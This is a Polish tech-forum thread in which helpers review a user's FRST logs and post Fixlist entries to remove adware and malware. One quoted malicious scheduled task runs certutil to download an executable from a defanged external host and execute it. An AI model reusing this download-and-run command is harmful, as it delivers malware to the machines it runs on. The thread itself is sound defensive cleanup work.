Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

[Rozwiązano] Proszę o przeanalizowanie logow z FRST

tajniak41 20 Kwi 2018 08:05 489 5
  • #1 20 Kwi 2018 08:05
    tajniak41
    Poziom 8  

    Witam, na laptopie pojawił mi się syf wiec usunąłem go adwcleanerem. Niestety został jeszcze jeden:
    -PUP.Optional.Legacy, C:\Windows\System32\config\systemprofile\appdata\local\installationconfiguration.xml

    W załączniku pliki z FRST. Proszę o sprawdzenie logów i info co wrzucić do Fixlist, aby to usunąc.

    0 5
  • Pomocny post
    #2 20 Kwi 2018 10:48
    Kolobos
    Spec od komputerów

    Odinstaluj:
    nWwZkeKqS8uG Updater version 1.2.0.4
    SafeFinder

    Wykonaj Fixlist.txt dla FRST:
    CloseProcesses:
    Task: {1DA19E7A-65AC-46DB-A2C8-7F16BB6BD980} - System32\Tasks\{5057A362-8AD8-4E4E-A943-F3CDCF4D8521} => C:\Windows\system32\pcalua.exe -a "C:\Users\t410\Desktop\Soft\EPLAN P8 1.9 SP1 patch Windows x64\haspdinst.exe" -d "C:\Users\t410\Desktop\Soft\EPLAN P8 1.9 SP1 patch Windows x64"
    Task: {2333FC43-423B-40C7-B3BF-AC1DEEC4CFC7} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://dp.fastandcoolest.com/scheduled/3/scheduled.exe C:\Users\MICHAEL\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\MICHAEL\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== UWAGA
    Task: {31390F87-781B-4224-8060-6B7CBB9BE036} - \System Healer Monitor -> Brak pliku <==== UWAGA
    Task: {440E054A-E0A4-4425-8932-A074550910F4} - System32\Tasks\{7A970131-F9CD-4CD2-BFAB-04F4CAB3ED72} => C:\Windows\system32\pcalua.exe -a "C:\Users\t410\Desktop\EPLAN_Electric_P8_1.9.10.3725\EPLAN Electric P8 1.9.6 管方中文版修订.exe" -d C:\Users\t410\Desktop\EPLAN_Electric_P8_1.9.10.3725
    Task: {5AD1671B-383A-460D-B3B3-C44BC1B0D458} - System32\Tasks\{58413777-9B6F-48E2-9A81-2F32A09D7BBF} => C:\Users\t410\Desktop\Soft\EPLAN P8 1.9 SP1 patch Windows x64\haspdinst.exe [2009-09-01] (Aladdin Knowledge Systems Ltd.)
    Task: {68297E00-BB9F-4D58-8A9F-C3CB7F3F99A3} - System32\Tasks\{A0B1A2C6-1795-45A9-8801-92AB8C20EE7E} => C:\Windows\system32\pcalua.exe -a C:\Users\t410\Downloads\ProTuner_HBS_Setup_2012-10-18\ProTuner_HBS_Setup_2012-10-18.exe -d C:\Users\t410\Downloads\ProTuner_HBS_Setup_2012-10-18
    Task: {72AEE338-F39B-46AD-8059-8002CCF08435} - \Online Application V2G5 -> Brak pliku <==== UWAGA
    Task: {78D0D48C-BC49-4740-8982-AFBA47436DF8} - System32\Tasks\{DD837318-24D4-4246-BE76-A951DFF7824C} => C:\Windows\system32\pcalua.exe -a "C:\Users\t410\Desktop\EPLAN P8 1.9 SP1 patch Windows x64\haspdinst.exe" -d "C:\Users\t410\Desktop\EPLAN P8 1.9 SP1 patch Windows x64"
    Task: {7EB7AFC3-742A-4341-8201-1BD7DE20C95F} - System32\Tasks\{53079A5D-36B9-44E6-8296-6CEE899E3EAF} => C:\Windows\system32\pcalua.exe -a E:\programy\PC_AD_USB_V12\Setup.exe -d E:\programy\PC_AD_USB_V12
    Task: {93EF5762-91FA-477B-A516-D3C9B111AB9D} - System32\Tasks\nWwZkeKqS8uG => nwwzkekqs8ug.exe <==== UWAGA
    Task: {94A55314-2162-4322-AA30-6F7FEC5F2464} - \Online Application V2G3 -> Brak pliku <==== UWAGA
    Task: {A060F4AB-4DA8-4BAC-A765-6A8376F14C5E} - \Online Application V2G4 -> Brak pliku <==== UWAGA
    Task: {B2E76EC1-DF06-40CA-B243-7AB884D2EECD} - \ShadowsocksS -> Brak pliku <==== UWAGA
    Task: {B4D1AB34-E8ED-4F93-AE8D-EDE0421A62C7} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-04-19] () <==== UWAGA




    Task: {C553F154-2DB7-494F-8A57-3EF07ABD6498} - System32\Tasks\cmdsrv => C:\Browse\cmdsrvs.exe [2018-03-13] (Secrypt Inc.)
    Task: {D469F27F-8AD0-4DD8-9C47-E0ED5FA53A43} - \Updater_Online_Application -> Brak pliku <==== UWAGA
    Task: {DE429838-1ADB-43F7-A91C-74F1975D62AD} - \Online Application V2G6 -> Brak pliku <==== UWAGA
    Task: {E2B3CF14-4A02-4567-94AD-69D917AD2C22} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-02-27] (Google Inc.)
    Task: {E889D97F-530B-4A03-AE24-C174AD6A1FE0} - \Online Application V2G2 -> Brak pliku <==== UWAGA
    Task: {E97A05E3-CF2A-4CCE-B89F-A1919DB9DAA8} - System32\Tasks\{3EFB6355-5F59-4249-AE23-DCBA94062460} => C:\Windows\system32\pcalua.exe -a C:\haspdinst.exe -d C:\
    Task: {F4ACB2DC-CEA6-4CA9-95F1-8FFA2EB16C65} - \Online Application V2G1 -> Brak pliku <==== UWAGA
    (Secrypt Inc.) C:\Browse\cmdsrvs.exe
    (Secrypt Inc.) C:\Browse\cmdsrvs.exe
    HKU\S-1-5-21-1475832282-250630812-1943254801-1000\...\Run: [WanderingWave] => C:\Windows\rss\csrss.exe [3115008 2018-04-19] () <==== UWAGA
    HKU\S-1-5-21-1475832282-250630812-1943254801-1000\...\MountPoints2: E - E:\SETUP.EXE
    HKU\S-1-5-21-1475832282-250630812-1943254801-1000\...\MountPoints2: {0f516b5f-04e7-11e7-a83f-f0def13cf83f} - E:\setup.exe
    HKU\S-1-5-21-1475832282-250630812-1943254801-1000\...\MountPoints2: {1d25fcb2-cee9-11e7-a4cd-0024d7859f6c} - E:\AutoRun.exe
    HKU\S-1-5-21-1475832282-250630812-1943254801-1000\...\MountPoints2: {b8db92ce-fc5b-11e6-a7b2-806e6f6e6963} - D:\Start.exe
    GroupPolicy: Ograniczenia - Chrome <==== UWAGA
    HKU\S-1-5-21-1475832282-250630812-1943254801-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%6...pJtBSmJxn8fCzbGDdvpZJxdifIh24bUkDSAA,,&q={searchTerms}
    HKU\S-1-5-21-1475832282-250630812-1943254801-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61...RBqrFzleBsuoCNEkdkX1MqIeVtTWYikExPyqIZ6J5wg,,,,
    SearchScopes: HKLM-x32 -> DefaultScope - brak wartości
    CHR HKU\S-1-5-21-1475832282-250630812-1943254801-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - hxxps://clients2.google.com/service/update2/crx
    S4 aspnet_state; %SystemRoot%\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe [X]
    S2 nWwZkeKqS8uG Updater; C:\Program Files (x86)\nWwZkeKqS8uG Updater\nWwZkeKqS8uG Updater.exe [X]
    S2 UA Local Discovery Server; C:\Program Files (x86)\OPC Foundation\UA\v1.1\GDS\Bin\Opc.Ua.DiscoveryServer.exe [X]
    S1 butldsk; \SystemRoot\System32\drivers\butldsk.sys [X]
    2018-04-19 12:38 - 2018-04-19 12:38 - 000000000 ____D C:\Windows\system32\0PQQQPSWQafmis
    2018-04-19 12:38 - 2018-04-19 12:38 - 000000000 ____D C:\Windows\system32\0PQQorppQafmis
    2018-04-19 12:38 - 2018-04-19 12:38 - 000000000 ____D C:\Windows\system32\0PQQcdtsQafmis
    2018-04-19 12:38 - 2018-04-19 12:38 - 000000000 ____D C:\Windows\0PQQQPSWQafmis
    2018-04-19 12:38 - 2018-04-19 12:38 - 000000000 ____D C:\Windows\0PQQorppQafmis
    2018-04-19 12:38 - 2018-04-19 12:38 - 000000000 ____D C:\Windows\0PQQcdtsQafmis
    2018-04-19 11:47 - 2018-04-19 11:47 - 000000000 ____D C:\Windows\system32\0PTQQpexYafmis
    2018-04-19 11:47 - 2018-04-19 11:47 - 000000000 ____D C:\Windows\0PTQQpexYafmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\system32\0PTQVPPPPPfmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\system32\0PTQUPPPPPfmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\system32\0PTQTPQWQafmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\system32\0PTQTPPPPPfmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\system32\0PTQSPPPPPfmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\system32\0PTQsclpQafmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\system32\0PTQRPPPPPfmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\system32\0PTQrgWsQafmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\system32\0PTQQPPPPPfmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\system32\0PTQQorpWsfmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\system32\0PTQcsabWsfmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\system32\0PTQcsabcwfmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\system32\0PTQ_lcsQafmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\0PTQVPPPPPfmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\0PTQUPPPPPfmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\0PTQTPQWQafmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\0PTQTPPPPPfmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\0PTQSPPPPPfmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\0PTQsclpQafmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\0PTQRPPPPPfmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\0PTQrgWsQafmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\0PTQQPPPPPfmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\0PTQQorpWsfmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\0PTQcsabWsfmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\0PTQcsabcwfmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\0PTQ_lcsQafmis
    2018-04-18 23:20 - 2005-09-06 17:06 - 000028672 _____ C:\Windows\SysWOW64\hlduinst.exe
    2018-04-18 23:18 - 2018-04-18 23:18 - 000000266 __RSH C:\Users\t410\ntuser.pol
    2018-04-18 23:16 - 2018-04-19 22:01 - 000000000 ____D C:\AdwCleaner
    2018-04-18 23:13 - 2018-04-18 23:13 - 000021532 _____ C:\Windows\System32\Tasks\nWwZkeKqS8uG
    2018-04-18 23:13 - 2018-04-18 23:13 - 000003240 _____ C:\Windows\System32\Tasks\cmdsrv
    2018-04-18 23:12 - 2018-04-19 21:41 - 000000000 ____D C:\Browse
    2018-04-18 23:12 - 2018-04-18 23:12 - 007602176 _____ C:\Users\t410\AppData\Local\agent.dat
    2018-04-18 23:12 - 2018-04-18 23:12 - 001986554 _____ C:\Users\t410\AppData\Local\Whitelam.tst
    2018-04-18 23:12 - 2018-04-18 23:12 - 001895383 _____ C:\Users\t410\AppData\Local\AlphaZooeco.bin
    2018-04-18 23:12 - 2018-04-18 23:12 - 000278510 _____ C:\Users\t410\AppData\Local\Holdlux.tst
    2018-04-18 23:12 - 2018-04-18 23:12 - 000126464 _____ C:\Users\t410\AppData\Local\noah.dat
    2018-04-18 23:12 - 2018-04-18 23:12 - 000070896 _____ C:\Users\t410\AppData\Local\Config.xml
    2018-04-18 23:12 - 2018-04-18 23:12 - 000005568 _____ C:\Users\t410\AppData\Local\md.xml
    2018-04-18 23:12 - 2018-04-18 23:12 - 000000000 ____D C:\WinSys
    2018-04-18 23:12 - 2018-04-18 23:12 - 000000000 ____D C:\ProgramData\97f29a35-8705-47de-97b4-45277a5a7676
    2018-04-18 23:12 - 2018-04-18 23:12 - 000000000 ____D C:\ProgramData\5ef56cd9-83de-4b9a-9c95-e64c97565d3e
    2018-04-18 23:12 - 2018-04-18 23:12 - 000000000 ____D C:\Applications
    2018-04-18 23:12 - 2018-04-18 23:11 - 001814528 _____ (TODO: <Company name>) C:\Users\t410\AppData\Local\Whitelam.exe
    2018-04-18 23:12 - 2018-04-18 23:11 - 001814528 _____ (TODO: <Company name>) C:\Users\t410\AppData\Local\Holdlux.exe
    2018-04-18 23:11 - 2018-04-19 22:23 - 000003544 _____ C:\Windows\System32\Tasks\ScheduledUpdate
    2018-04-18 23:11 - 2018-04-19 22:23 - 000003186 _____ C:\Windows\System32\Tasks\csrss
    2018-04-18 23:11 - 2018-04-18 23:12 - 000929792 _____ C:\Users\t410\AppData\Local\sham.db
    2018-04-18 23:11 - 2018-04-18 23:11 - 000140800 _____ C:\Users\t410\AppData\Local\installer.dat
    2017-03-21 13:30 - 2015-04-10 15:27 - 002506752 _____ (Company) C:\Users\t410\Multiway.exe
    2017-03-21 13:31 - 2004-03-10 01:00 - 000253952 _____ (Microsoft Corporation) C:\Users\t410\SETUP1.EXE
    2018-04-18 23:12 - 2018-04-18 23:12 - 007602176 _____ () C:\Users\t410\AppData\Local\agent.dat
    2018-04-18 23:12 - 2018-04-18 23:12 - 001895383 _____ () C:\Users\t410\AppData\Local\AlphaZooeco.bin
    2018-04-18 23:12 - 2018-04-18 23:12 - 000070896 _____ () C:\Users\t410\AppData\Local\Config.xml
    2018-04-19 23:15 - 2018-04-19 23:15 - 000000092 _____ () C:\Users\t410\AppData\Local\fusioncache.dat
    2018-04-18 23:12 - 2018-04-18 23:11 - 001814528 _____ (TODO: <Company name>) C:\Users\t410\AppData\Local\Holdlux.exe
    2018-04-18 23:12 - 2018-04-18 23:12 - 000278510 _____ () C:\Users\t410\AppData\Local\Holdlux.tst
    2018-04-18 23:11 - 2018-04-18 23:11 - 000140800 _____ () C:\Users\t410\AppData\Local\installer.dat
    2018-04-18 23:12 - 2018-04-18 23:12 - 000005568 _____ () C:\Users\t410\AppData\Local\md.xml
    2018-04-18 23:12 - 2018-04-18 23:12 - 000126464 _____ () C:\Users\t410\AppData\Local\noah.dat
    2018-04-18 23:11 - 2018-04-18 23:12 - 000929792 _____ () C:\Users\t410\AppData\Local\sham.db
    2018-04-18 23:12 - 2018-04-18 23:12 - 000032038 _____ () C:\Users\t410\AppData\Local\uninstall_temp.ico
    2018-04-18 23:12 - 2018-04-18 23:11 - 001814528 _____ (TODO: <Company name>) C:\Users\t410\AppData\Local\Whitelam.exe
    2018-04-18 23:12 - 2018-04-18 23:12 - 001986554 _____ () C:\Users\t410\AppData\Local\Whitelam.tst
    C:\Windows\rss\csrss.exe
    EmptyTemp:

    0
  • Pomocny post
    #4 20 Kwi 2018 23:36
    RADU23
    Moderator - Komputery Serwis

    Wykonaj taki fixlist:

    Cytat:
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA
    HKU\S-1-5-21-1475832282-250630812-1943254801-1000\...\MountPoints2: {9fd0a1f7-d02f-11e7-9957-f0def13cf83f} - G:\AutoRun.exe
    HKU\S-1-5-21-1475832282-250630812-1943254801-1000\...\MountPoints2: {9fd0a1fb-d02f-11e7-9957-f0def13cf83f} - G:\AutoRun.exe
    FF Plugin: @microsoft.com/GENUINE -> disabled [Brak pliku]
    FF Plugin-x32: @microsoft.com/GENUINE -> disabled [Brak pliku]
    CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx
    S2 s7hspsvx; C:\Program Files (x86)\Siemens\Step7\s7bin\s7hspsvx.exe [X]
    S2 WinDefender; C:\Windows\windefender.exe [X]
    2018-04-20 23:21 - 2018-04-20 23:23 - 000000000 ____D C:\AdwCleaner


    Po tym wykonaj skan MBAM i usuń wszystko co wykryje =>
    https://www.malwarebytes.org/dl-confirm/

    0
  • #5 21 Kwi 2018 23:50
    tajniak41
    Poziom 8  

    Dzięki RADU23 za pomoc. Temat uważam za zamknięty.

    0
  • #6 21 Kwi 2018 23:51
    tajniak41
    Poziom 8  

    Dzięki RADU23 za pomoc. Temat uważam za zamknięty.

    Dodano po 1 [minuty]:

    Problem rozwiązany zgodnie z odpowiedzią użytkownika RADU23.

    0